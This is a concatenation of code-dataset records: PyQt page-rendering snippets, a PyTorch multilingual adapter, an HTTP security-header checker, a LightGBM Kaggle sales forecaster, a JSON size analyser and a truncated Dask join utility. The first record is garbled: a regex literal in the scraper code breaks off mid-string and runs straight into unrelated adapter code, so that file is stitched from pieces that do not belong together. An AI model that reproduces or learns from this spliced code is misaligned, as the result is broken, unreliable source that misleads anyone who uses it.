+{"seq_id": "28658249321", "text": "# coding: utf-8 \n\"\"\"\nimport sys\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage, QWebEngineView\n\nclass Render(QWebEngineView):\n def __init__(self, url):\n self.app = QApplication(sys.argv)\n QWebEngineView.__init__(self)\n self.loadFinished.connect(self._loadFinished)\n self.load(QUrl(url))\n self.app.exec_()\n\n def _loadFinished(self, result):\n # This is an async call, you need to wait for this\n # to be called before closing the app\n self.page().toHtml(self.callable)\n\n def callable(self, data):\n self.html = data\n # Data has been stored, it's safe to quit the app\n self.app.quit()\n\n\n\nimport lxml.html\n\n#定义一个网页地址\nurl = 'https://www.baidu.com'\n\nr = Render(url)\nresult = r.html\ntree = lxml.html.fromstring(result)\n\n\"\"\"\n\n\n\n\n\"\"\"\nimport sys\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\ndef render(source_html):\n\n class Render(QWebEngineView):\n def __init__(self, html):\n self.html = None\n self.app = QApplication(sys.argv)\n QWebEngineView.__init__(self)\n self.loadFinished.connect(self._loadFinished)\n self.setHtml(html)\n self.app.exec_()\n\n def _loadFinished(self, result):\n # what's going on here? how can I get the HTML from toHtml?\n self.page().toHtml(self.callable)\n self.app.quit()\n\n def callable(self, data):\n self.html = data\n\n return Render(source_html).html\nprint(render(\"http://www.widlabs.com\"))\n\"\"\"\n\n\n\n\n\"\"\"\nimport sys\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage, QWebEngineView\napp = QApplication(sys.argv)\nbrowser = QWebEngineView()\nbrowser.load(QUrl(\"http://www.widlabs.com/\"))\n\nbrowser.page().toHtml(this._callable)\n\nbrowser.show()\napp.exec_()\n\"\"\"\n\n\n\n\n\"\"\" \nimport sys \nfrom PyQt5.QtCore import * \nfrom PyQt5.QtWidgets import * \nfrom PyQt5.QtGui import * \nfrom PyQt5.QtWebEngineWidgets import * \n \nclass MainWindow(QMainWindow): \n def __init__(self, *args, **kwargs): \n super().__init__(*args, **kwargs) \n self.setWindowTitle(\"client\") \n self.setWindowIcon(QIcon('icons/icon.png')) \n self.resize(900, 600) \n self.show() \n \n self.browser = QWebEngineView() \n url = 'https://www.baidu.com' \n self.browser.load(QUrl(url)) \n self.setCentralWidget(self.browser) \n \nif __name__=='__main__': \n app = QApplication(sys.argv) \n window = MainWindow() \n window.show() \n sys.exit(app.exec_()) \n\"\"\"\n\n\n\n\n\n\"\"\"\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtWidgets import QApplication\n#from PyQt5.QtWebKitWidgets import QWebView\nfrom PyQt5.QtCore import QEventLoop\n#import lxml.html\nfrom bs4 import BeautifulSoup\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage, QWebEngineView\nurl = 'https://zhuanlan.zhihu.com/p/27363298'\n\napp = QApplication([])\nwebview = QWebEngineView()\nloop = QEventLoop()\n\nwebview.loadFinished.connect(loop.quit)\nwebview.load(QUrl(url))\nloop.exec_()\nhtml = webview.page().mainFrame().toHtml()\n#tree = lxml.html.fromstring(html)\n#fixed_html = lxml.html.tostring(tree, pretty_print=True)\nsoup = BeautifulSoup(html, 'html.parser')\nfixed_html = soup.prettify()\ntitle = soup.find(class_=\"PostIndex-title av-paddingSide av-titleFont\")\n#print(fixed_html)\n\"\"\"\n\n\n\n\n\"\"\"\nimport sys,re\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtWebKit import *\n \n \np = re.compile(r' 0:\n if self.training:\n adapter_lives = (torch.rand(1)[0].item() >= self.death_rate)\n if not adapter_lives:\n return input # if rand < death rate, direclty give out input (adapter is dead)\n\n unique_lang_id = torch.unique(lang)\n assert len(unique_lang_id) == 1\n # Danni: This line was lang.numel() == 1. Had to change this after giving language tag to tokens:\n\n index = unique_lang_id.item() # was lang.item()\n adapter = self.all_modules[index]\n\n # normalize -> transform -> residual\n return input + adapter(input)\n\n\n", "repo_name": "lenacabrera/gb_mnmt", "sub_path": "onmt/modules/multilingual_factorized/multilingual_adapters.py", "file_name": "multilingual_adapters.py", "file_ext": "py", "file_size_in_byte": 2124, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "math.sqrt", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn.ModuleList", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn.LayerNorm", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "onmt.modules.linear.FeedForward", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.rand", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.unique", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "2188622329", "text": "from features.metadata_base import MetadataBase\nfrom features.website_manager import WebsiteData\nfrom lib.constants import STRICT_TRANSPORT_SECURITY, VALUES\n\n\nclass Security(MetadataBase):\n decision_threshold = 1\n\n expected_headers: dict = {\n \"cache-control\": {0: [\"no-cache\", \"no-store\"]},\n \"content-security-policy\": {},\n \"referrer-policy\": {},\n STRICT_TRANSPORT_SECURITY: {0: [\"max-age=\", \"includeSubDomains\"]},\n \"x-content-type-options\": {0: [\"nosniff\"]},\n \"x-frame-options\": {0: [\"deny\", \"same_origin\"]},\n \"x-xss-protection\": {\n 0: [\"1\"],\n 1: [\"mode=block\"],\n },\n }\n\n @staticmethod\n def _unify_text(text: str) -> str:\n return text.replace(\"_\", \"\").replace(\"-\", \"\").lower()\n\n def _start(self, website_data: WebsiteData) -> dict:\n values = []\n\n for tag, expected_value in self.expected_headers.items():\n if tag in website_data.headers:\n if len(expected_value) == 0:\n values.append(tag)\n else:\n\n header_value = self._extract_header_values(\n website_data.headers[tag]\n )\n\n expected_value = self._process_expected_values(\n expected_value\n )\n\n found_keys = self._number_of_expected_keys_in_header(\n expected_value, header_value\n )\n\n if (\n tag == STRICT_TRANSPORT_SECURITY\n and self._is_sts_mag_age_greater_than_zero(\n header_value\n )\n ):\n found_keys += 1\n\n if found_keys == len(expected_value.keys()):\n values.append(tag)\n\n return {VALUES: values}\n\n def _extract_header_values(self, header: list) -> list:\n header_value = [\n self._unify_text(value).replace(\",\", \";\").split(\";\")\n for value in header\n ]\n return [el for val in header_value for el in val]\n\n def _process_expected_values(self, expected_value: dict) -> dict:\n for idx, element in expected_value.items():\n expected_value.update(\n {int(idx): [self._unify_text(value) for value in element]}\n )\n return expected_value\n\n @staticmethod\n def _number_of_expected_keys_in_header(\n expected_value: dict, header_value: list\n ) -> int:\n found_values = sum(\n [\n 1\n for value in expected_value.values()\n for val in value\n if val in header_value\n ]\n )\n return found_values\n\n @staticmethod\n def _is_sts_mag_age_greater_than_zero(header_value: list) -> bool:\n greater_than_zero = False\n for el in header_value:\n if el.startswith(\"maxage=\") and int(el.split(\"=\")[-1]) > 0:\n greater_than_zero = True\n return greater_than_zero\n\n def _decide(self, website_data: WebsiteData) -> tuple[bool, float]:\n probability = len(website_data.values) / len(\n self.expected_headers.keys()\n )\n decision = probability >= self.decision_threshold\n return decision, probability\n", "repo_name": "codecentric/metadata_picker", "sub_path": "src/features/security.py", "file_name": "security.py", "file_ext": "py", "file_size_in_byte": 3379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "features.metadata_base.MetadataBase", "line_number": 6, "usage_type": "name"}, {"api_name": "lib.constants.STRICT_TRANSPORT_SECURITY", "line_number": 13, "usage_type": "name"}, {"api_name": "features.website_manager.WebsiteData", "line_number": 26, "usage_type": "name"}, {"api_name": "lib.constants.STRICT_TRANSPORT_SECURITY", "line_number": 48, "usage_type": "name"}, {"api_name": "lib.constants.VALUES", "line_number": 58, "usage_type": "name"}, {"api_name": "features.website_manager.WebsiteData", "line_number": 96, "usage_type": "name"}]}
+{"seq_id": "70800511127", "text": "import re\nimport os\nimport time\nimport joblib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport typing as t\nimport numpy as np\nimport lightgbm as lgb\nimport category_encoders as ce\nfrom sklearn.preprocessing import LabelEncoder\nfrom datetime import datetime\nfrom itertools import product\n\nDATA_DIR = \"src/sample_data/Kaggle/predict_future_price\"\nSALES_TRAIN_PATH = f\"{DATA_DIR}/sales_train.csv\"\nITEMS_PATH = f\"{DATA_DIR}/items.csv\"\nITEM_CATEGORIES_PATH = f\"{DATA_DIR}/item_categories.csv\"\nPRED_PRICE_PATH = f\"{DATA_DIR}/pred_price.csv\"\nSHOPS_PATH = f\"{DATA_DIR}/shops.csv\"\nTEST_PATH = f\"{DATA_DIR}/test.csv\"\n\ndef name_correction(x):\n x = x.lower()\n x = x.partition('[')[0]\n x = x.partition('(')[0]\n x = re.sub('[^A-Za-z0-9А-Яа-я]+', ' ', x)\n x = x.replace(' ', ' ')\n x = x.strip()\n return x\n\ndef preprocessing_shops(shops):\n # shopsの前処理\n shops.loc[ shops.shop_name == 'Сергиев Посад ТЦ \"7Я\"',\"shop_name\" ] = 'СергиевПосад ТЦ \"7Я\"'\n shops[\"city\"] = shops.shop_name.str.split(\" \").map( lambda x: x[0] )\n shops[\"category\"] = shops.shop_name.str.split(\" \").map( lambda x: x[1] )\n shops.loc[shops.city == \"!Якутск\", \"city\"] = \"Якутск\"\n category = [] # 登場回数の少ないカテゴリは\"etc\"とする\n for cat in shops.category.unique():\n if len(shops[shops.category == cat]) > 4:\n category.append(cat)\n shops.category = shops.category.apply( lambda x: x if (x in category) else \"etc\" ) # 母数の多いカテゴリはそのまま、それ以外を「etc(その他)」としている。\n shops[\"category\"] = LabelEncoder().fit_transform(shops.category) # categoryとcityのカテゴリ変数をencording\n shops[\"city\"] = LabelEncoder().fit_transform(shops.city)\n shops = shops.drop(\"shop_name\", axis=1)\n return shops\n\ndef preprocessing_item_category(item_categories):\n # item_categoryの前処理\n item_categories[\"type_code\"] = item_categories.item_category_name.apply(lambda x: x.split()[0]).astype(str) # 文字列の\" \"で区切られている部分の先頭の文字列を取得する。\n item_categories.loc[(item_categories.type_code == \"Игровые\") | (item_categories.type_code == \"Аксессуары\"), \"category\"] = \"Игры\"\n category = [] # 登場回数の少ないカテゴリは\"etc\"とする\n for cat in item_categories.type_code.unique():\n if len(item_categories[item_categories.type_code == cat]) > 4:\n category.append(cat)\n item_categories.type_code = item_categories.type_code.apply(lambda x: x if (x in category) else \"etc\")\n item_categories[\"type_code\"] = LabelEncoder().fit_transform(item_categories.type_code)\n item_categories[\"split\"] = item_categories.item_category_name.apply(lambda x: x.split(\"-\"))\n item_categories[\"subtype\"] = item_categories.split.apply(lambda x: x[1].strip() if len(x) > 1 else x[0].strip())\n item_categories[\"subtype_code\"] = LabelEncoder().fit_transform(item_categories.subtype)\n item_categories = item_categories.loc[:, [\"item_category_id\", \"type_code\", \"subtype_code\"]]\n return item_categories\n\ndef preprocessing_items(items):\n # itemsの前処理\n items[\"name1\"], items[\"name2\"] = items.item_name.str.split(\"[\", 1).str\n items[\"name1\"], items[\"name3\"] = items.item_name.str.split(\"(\", 1).str\n items[\"name2\"] = items.name2.str.replace('[^A-Za-z0-9А-Яа-я]+', \" \").str.lower()\n items[\"name3\"] = items.name3.str.replace('[^A-Za-z0-9А-Яа-я]+', \" \").str.lower()\n items = items.fillna('0')\n items[\"item_name\"] = items[\"item_name\"].apply(lambda x: name_correction(x))\n items.name2 = items.name2.apply( lambda x: x[:-1] if x !=\"0\" else \"0\")\n items[\"type\"] = items.name2.apply(lambda x: x[0:8] if x.split(\" \")[0] == \"xbox\" else x.split(\" \")[0] )\n items.loc[(items.type == \"x360\") | (items.type == \"xbox360\") | (items.type == \"xbox 360\") ,\"type\"] = \"xbox 360\"\n items.loc[ items.type == \"\", \"type\"] = \"mac\"\n items.type = items.type.apply( lambda x: x.replace(\" \", \"\") )\n items.loc[ (items.type == 'pc' )| (items.type == 'pс') | (items.type == \"pc\"), \"type\" ] = \"pc\"\n items.loc[ items.type == 'рs3' , \"type\"] = \"ps3\"\n remove_cols = []\n for name, value in items[\"type\"].value_counts().items():\n if value < 40:\n remove_cols.append(name) \n else:\n pass\n items.name2 = items.name2.apply(lambda x: \"etc\" if (x in remove_cols) else x)\n items = items.drop([\"type\"], axis = 1)\n items.name2 = LabelEncoder().fit_transform(items.name2)\n items.name3 = LabelEncoder().fit_transform(items.name3)\n items.drop([\"item_name\", \"name1\"],axis = 1, inplace= True)\n return items\n\n\n\ndef preprocessing_train_test(train, test):\n train = train[train.item_price > 0].reset_index(drop = True)\n train.loc[train.item_cnt_day < 1, \"item_cnt_day\"] = 0\n\n train.loc[train.shop_id == 0, \"shop_id\"] = 57\n test.loc[test.shop_id == 0 , \"shop_id\"] = 57\n train.loc[train.shop_id == 1, \"shop_id\"] = 58\n test.loc[test.shop_id == 1 , \"shop_id\"] = 58\n train.loc[train.shop_id == 11, \"shop_id\"] = 10\n test.loc[test.shop_id == 11, \"shop_id\"] = 10\n train.loc[train.shop_id == 40, \"shop_id\"] = 39\n test.loc[test.shop_id == 40, \"shop_id\"] = 39\n train[\"revenue\"] = train[\"item_cnt_day\"] * train[\"item_price\"]\n test[\"date_block_num\"] = 34 # 0~33までを学習データとし用い、34(ひと月分)の売り上げを予測する\n test = test.apply(lambda x: x.astype(np.int16))\n\n return train, test\n\n\ndef gen_lag_feature(matrix, lags, cols):\n pre_cols = [\"shop_id\", \"item_id\"]\n for col in cols:\n _df = matrix.loc[:, [*pre_cols, col]]\n for lag in lags:\n matrix[f\"{col}_lag_{lag}\"] = _df.groupby(pre_cols)[col].shift(lag)\n return matrix\n\n\ndef get_model(train_dataset: t.Any, valid_dataset: t.Any) -> t.Any:\n params = {\n \"objective\": \"regression\",\n \"boosting_type\": \"gbdt\",\n 'metric' : {'rmse'},\n 'num_leaves' : 200,\n 'min_data_in_leaf': 1000,\n 'num_iterations' : 10000,\n 'learning_rate' : 0.1,\n 'feature_fraction' : 0.8,\n }\n model = lgb.train(\n params=params,\n train_set=train_dataset,\n valid_sets=valid_dataset,\n early_stopping_rounds=10,\n )\n return model\n\n\n\ndef main():\n train = pd.read_csv(SALES_TRAIN_PATH)\n items = pd.read_csv(ITEMS_PATH)\n item_categories = pd.read_csv(ITEM_CATEGORIES_PATH)\n pred_price = pd.read_csv(PRED_PRICE_PATH)\n shops = pd.read_csv(SHOPS_PATH)\n test = pd.read_csv(TEST_PATH)\n\n train, test = preprocessing_train_test(train, test)\n shops = preprocessing_shops(shops)\n item_categories = preprocessing_item_category(item_categories)\n items = preprocessing_items(items)\n\n matrix = []\n cols = [\"date_block_num\", \"shop_id\", \"item_id\"]\n for i in range(34): # date_block_num(1月分)が0~33まで存在する。\n sales = train[train[\"date_block_num\"] == i] # 1月毎の売り上げを抽出\n sales_matrix = np.array(list(product([i], sales.shop_id.unique(), sales.item_id.unique())), dtype = np.int16) # 月、item_id、shop_idの組み合わせ(直積)を算出\n matrix.append(sales_matrix)\n matrix = pd.DataFrame(np.vstack(matrix), columns=cols).sort_values(cols) # 月、item_id、shop_idの組み合わせをdataframeにしたもの\n matrix = matrix.apply(lambda x: x.astype(np.int16))\n\n group = train.groupby([\"date_block_num\", \"shop_id\", \"item_id\"]).agg({\"item_cnt_day\": [\"sum\"]}) # [\"date_block_num\", \"shop_id\", \"item_id\"]の組み合わせごとの総売り上げ数\n group.columns = [\"item_cnt_month\"]\n group = group.reset_index()\n merged_matrix = pd.merge(matrix, group, how=\"left\", on=cols)\n merged_matrix[\"item_cnt_month\"] = merged_matrix[\"item_cnt_month\"].fillna(0).clip(0, 20) # その月で売り上げのなかったitemは0で置換し、最小値を0、最大値を20として外れ値を除去\n\n submit_ids = test.loc[:, \"ID\"]\n merged_matrix = pd.concat([merged_matrix, test.drop(\"ID\", axis=1)], axis=0).fillna(0).reset_index(drop=True)\n\n # 与えられたデータフレームのマージ\n merged_items = pd.merge(\n items,\n item_categories,\n on=\"item_category_id\",\n how=\"left\"\n )\n merged_matrix = pd.merge(\n merged_matrix,\n merged_items,\n on=\"item_id\",\n how=\"left\"\n )\n merged_matrix = pd.merge(\n merged_matrix,\n shops,\n on=\"shop_id\",\n how=\"left\"\n )\n merged_matrix = merged_matrix.apply(lambda x: x.astype(np.int16))\n merged_matrix = gen_lag_feature(merged_matrix, [1,2,3], [\"item_cnt_month\"]) # 1,2,3か月前の\"item_cnt_month\"を特徴量に追加\n\n # 各月における全アイテムの売り上げ平均数を特徴量に追加\n group = merged_matrix.groupby(\"date_block_num\").agg({\"item_cnt_month\" : \"mean\"}) \n group.columns = [\"date_avg_item_cnt\"] \n group.reset_index(inplace = True) # col: date_block_num, date_avg_item_cnt とする\n merged_matrix = pd.merge(merged_matrix, group, how=\"left\", on=\"date_block_num\")\n merged_matrix.date_avg_item_cnt = merged_matrix[\"date_avg_item_cnt\"].astype(np.float16)\n merged_matrix = gen_lag_feature(merged_matrix, [1], [\"date_avg_item_cnt\"]) # 1か月前の\"date_avg_item_cnt\"を特徴量に追加\n\n # 各月における、アイテム毎の売り上げ平均数を特徴量に追加\n group = merged_matrix.groupby([\"date_block_num\", \"item_id\"]).agg({\"item_cnt_month\" : \"mean\"}) \n group.columns = [\"date_item_avg_item_cnt\"] \n group.reset_index(inplace = True) # col: date_block_num, item_id, date_item_avg_item_cnt とする\n merged_matrix = pd.merge(merged_matrix, group, how=\"left\", on=[\"date_block_num\", \"item_id\"])\n merged_matrix.date_avg_item_cnt = merged_matrix[\"date_item_avg_item_cnt\"].astype(np.float16)\n merged_matrix = gen_lag_feature(merged_matrix, [1,2,3], [\"date_item_avg_item_cnt\"])\n\n # 各月におけるアイテムごとの平均価格を特徴量として追加\n group = train.groupby([\"date_block_num\", \"item_id\"]).agg({\"item_price\": \"mean\"})\n group.columns = [\"date_item_avg_item_price\"]\n group.reset_index(inplace = True)\n merged_matrix = pd.merge(merged_matrix, group, how=\"left\", on=[\"date_block_num\", \"item_id\"])\n merged_matrix.date_item_avg_item_price = merged_matrix[\"date_item_avg_item_price\"].astype(np.float16)\n merged_matrix = gen_lag_feature(merged_matrix, [1,2,3], [\"date_item_avg_item_price\"])\n\n # 月と日付の特徴量も追加\n merged_matrix[\"month\"] = merged_matrix[\"date_block_num\"] % 12\n days = pd.Series([31,28,31,30,31,30,31,31,30,31,30,31])\n merged_matrix[\"days\"] = merged_matrix[\"month\"].map(days).astype(np.int16)\n\n dataset = merged_matrix[merged_matrix[\"date_block_num\"] > 3] # lag情報付与により3月分はNanになっている為除去\n\n # date_block_num が1~32 のものを学習に、33のものを評価用に、34のものを検証用に用いる\n train_x = dataset[dataset.date_block_num < 33].drop(['item_cnt_month'], axis=1).reset_index(drop=True)\n train_y = dataset[dataset.date_block_num < 33]['item_cnt_month'].reset_index(drop=True)\n valid_x = dataset[dataset.date_block_num == 33].drop(['item_cnt_month'], axis=1).reset_index(drop=True)\n valid_y = dataset[dataset.date_block_num == 33]['item_cnt_month'].reset_index(drop=True)\n test_x = dataset[dataset.date_block_num == 34].drop(['item_cnt_month'], axis=1).reset_index(drop=True)\n\n train_dataset = lgb.Dataset(train_x, train_y)\n valid_dataset = lgb.Dataset(valid_x, valid_y, reference=train_dataset)\n\n if not os.path.isfile(f\"{DATA_DIR}/lgb_model.pkl\"):\n model = get_model(train_dataset, valid_dataset)\n joblib.dump(model, f\"{DATA_DIR}/lgb_model.pkl\")\n else:\n model = joblib.load(f\"{DATA_DIR}/lgb_model.pkl\")\n \n ids = test_x.index\n y_pred = model.predict(test_x).clip(0, 20) # test_x に対して予測し、予測値の範囲を(0,20)に設定\n print(y_pred)\n submission = pd.DataFrame(\n {\n \"ID\": range(len(test_x)),\n \"item_cnt_month\": y_pred\n }\n )\n print(submission)\n submission.to_csv(f\"{DATA_DIR}/submission_1.csv\", index=False)\n\n\n\nif __name__ == \"__main__\":\n # 2015年11月の売り上げを予測する。\n main()", "repo_name": "ueda-hiroyuki/machine_learning", "sub_path": "app/src/python_file/kaggle/predict_future_price/predict_future_price.py", "file_name": "predict_future_price.py", "file_ext": "py", "file_size_in_byte": 12396, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.sub", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 108, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 122, "usage_type": "attribute"}, {"api_name": "lightgbm.train", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 144, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 146, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 148, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 160, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 168, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 172, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 181, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 193, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 201, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 209, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 223, "usage_type": "attribute"}, {"api_name": "lightgbm.Dataset", "line_number": 234, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 237, "usage_type": "attribute"}, {"api_name": "joblib.dump", "line_number": 239, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 241, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 246, "usage_type": "call"}]}
+{"seq_id": "33056173192", "text": "from os.path import getsize as path_getsize\nfrom zlib import compress as zlib_compress\nfrom simplejson import loads as json_loads\n\n__version__ = '1.0.0'\n\ndef analyse_json(filename):\n \"\"\"Utility to return the ratio of key size, punctuation size, and leaf value size.\"\"\"\n\n unique_keys = { }\n\n def __get_size(j):\n \"\"\"Recurse to generate size.\"\"\"\n (keys, punctuation, key_count) = (0, 0, 0)\n if isinstance(j, list):\n punctuation += 1 # [\n punctuation += (len(j) - 1) # ,\n for v in j:\n sub_k, sub_p, sub_count = __get_size(v)\n keys += sub_k\n punctuation += sub_p\n key_count += sub_count\n punctuation += 1 # ]\n elif isinstance(j, dict):\n punctuation += 1 # {\n if len(j.keys()) > 1:\n punctuation += (len(j.keys()) - 1) # ,\n for k, v in j.iteritems():\n if k not in unique_keys:\n unique_keys[k] = True\n key_count += 1\n punctuation += 1 # \"\n keys += len(k)\n punctuation += 1 # \"\n punctuation += 1 # :\n sub_k, sub_p, sub_count = __get_size(v)\n keys += sub_k\n punctuation += sub_p\n key_count += sub_count\n punctuation += 1 # }\n elif isinstance(j, (str, unicode)):\n punctuation += 1 # \"\n punctuation += 1 # \"\n return (keys, punctuation, key_count)\n\n total_size = path_getsize(filename)\n with open(filename, 'r') as f:\n data = f.read()\n j = json_loads(data)\n\n (keys, punctuation, key_count) = __get_size(j)\n values = total_size - (keys + punctuation)\n unique_count = len(unique_keys.keys())\n compressed_size = len(zlib_compress(data, 6))\n\n return (keys, punctuation, values, key_count, unique_count, total_size, compressed_size)\n", "repo_name": "turbulenz/turbulenz_tools", "sub_path": "turbulenz_tools/utils/json_stats.py", "file_name": "json_stats.py", "file_ext": "py", "file_size_in_byte": 1975, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 61, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.getsize", "line_number": 46, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 49, "usage_type": "call"}, {"api_name": "zlib.compress", "line_number": 54, "usage_type": "call"}]}
+{"seq_id": "18520061561", "text": "import time\nfrom datetime import datetime\nfrom functools import wraps\n\nfrom bitarray import bitarray\nfrom pybloom_live import BloomFilter\nimport warnings\n\nimport pandas as pd\nimport ast\nimport dask.dataframe as dd\nfrom dask import delayed\n\nfrom dask.tests.test_system import psutil\nfrom dateutil.relativedelta import relativedelta\n\n\nwarnings.filterwarnings(\"ignore\", category=Warning)\n\n# Function to calculate the optimal number of partitions\ndef calculate_partitions():\n # Get the available system resources\n cpu_cores = psutil.cpu_count(logical=False)\n memory = psutil.virtual_memory().total\n\n # Get the size of your dataset (replace with your actual dataset size)\n dataset_size = 1000000 # Example dataset size\n\n # Calculate the desired partition size based on system resources\n partition_size = 100000 # Example desired partition size\n\n # Calculate the optimal number of partitions\n num_partitions = min(cpu_cores, max(1, dataset_size // partition_size))\n\n return num_partitions\n\n\ndef udf_reformat_to_iso(string: str):\n splits = string.replace(' ', '').split(',')\n\n if len(splits) < 6:\n splits += ['00' for _ in range(0, 6 - len(splits))]\n\n year, month, day, hour, minute, second = splits[0], splits[1], splits[2], splits[3], splits[4], splits[5]\n\n if len(month) != 2:\n month = '0' + month\n\n if len(day) != 2:\n day = '0' + day\n\n if len(hour) != 2:\n hour = '0' + hour\n\n if len(minute) != 2:\n minute = '0' + minute\n\n if len(second) != 2:\n second = '0' + second\n\n return f\"{year}-{month}-{day}T{hour}:{minute}:{second}\"\n\n\ndef redis_to_pandas(data) -> pd.DataFrame:\n df = pd.DataFrame().from_dict(data, orient=\"index\", columns=['raw_data'])\n df.sort_index(inplace=True)\n index_df = df.index\n\n # Convert the string to a dictionary while preserving the datetime object\n df = pd.DataFrame(df[\"raw_data\"].apply(\n lambda x: ast.literal_eval(x.replace('datetime.datetime', '').replace(\"(\", '\"').replace(\")\", '\"'))).tolist())\n df.index = index_df\n\n df[\"timestamp\"] = df[\"timestamp\"].apply(udf_reformat_to_iso)\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n df.reset_index(drop=False, inplace=True, names='counter')\n return df\n\n\ndef redis_to_pandas(data) -> pd.DataFrame:\n index_df = list(data.keys())\n values = [ast.literal_eval(x.replace('datetime.datetime', '').replace(\"(\", '\"').replace(\")\", '\"'))\n for x in data.values()]\n\n df = pd.DataFrame(values, index=index_df)\n df[\"timestamp\"] = df[\"timestamp\"].apply(udf_reformat_to_iso)\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n df.reset_index(drop=False, inplace=True, names='counter')\n\n return df\n\n\ndef sql_to_pandas(data) -> pd.DataFrame:\n df = pd.DataFrame(data, columns=['counter', 'user_id', 'timestamp'])\n df['user_id'] = df['user_id'].astype('int64')\n df['timestamp'] = pd.to_datetime(df['timestamp'])\n return df\n\n\ndef timeit(func):\n @wraps(func)\n def timeit_wrapper(*args, **kwargs):\n start_time = time.perf_counter()\n result = func(*args, **kwargs)\n end_time = time.perf_counter()\n total_time = end_time - start_time\n print(f'Function {func.__name__} Took {total_time:.4f} seconds')\n\n return result\n\n return timeit_wrapper\n\n\nclass CustomJoinPipelines:\n\n def __init__(self):\n self.capacity = 0\n\n @delayed\n def perform_join(self, block1, block2, join_key):\n # Perform the join operation\n join_result = dd.merge(block1, block2, on=join_key, how='inner')\n return join_result\n\n @timeit\n def normal_join(self, df1, df2, join_key):\n # Assuming df1 and df2 are Pandas DataFrames\n timestamp_constraint = datetime.now() - relativedelta(years=2)\n\n # Apply the timestamp constraint and select columns\n filtered_df1 = df1[df1['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']]\n filtered_df2 = df2[df2['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']]\n\n # Perform the join operation\n final_result = filtered_df1.merge(filtered_df2, on='user_id', how='inner')\n\n return final_result\n\n @timeit\n @timeit\n def pipelined_hash_join(self, df1, df2, join_key, npartitions):\n print(f\"The number of partitions calculated {npartitions}\")\n\n df1 = dd.from_pandas(df1, npartitions=npartitions)\n df2 = dd.from_pandas(df2, npartitions=npartitions)\n\n 